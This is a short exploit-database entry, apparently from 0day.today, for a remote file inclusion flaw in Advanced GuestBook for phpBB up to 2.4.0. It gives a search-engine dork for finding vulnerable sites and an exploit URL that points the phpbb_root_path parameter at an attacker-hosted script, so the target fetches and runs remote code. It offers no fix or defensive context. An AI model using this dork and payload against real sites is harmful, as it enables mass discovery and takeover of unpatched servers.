id: 383
date: 04/27/2006
title: Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability
author: [Oo]
cves: 

================================================================
Advanced GuestBook <= 2.4.0 (phpBB) File Inclusion Vulnerability
================================================================



Title: Advanced GuestBook for phpBB <= 2.4.0 Remote File Inclusion
Dork: inurl:guestbook.php "Advanced GuestBook" "powered by phpbb"
Credits: [Oo]

Exploit: http://[url]/[phpbb_path]/admin/addentry.php?phpbb_root_path=http://[badscript]?



#  0day.today [2023-03-24]  #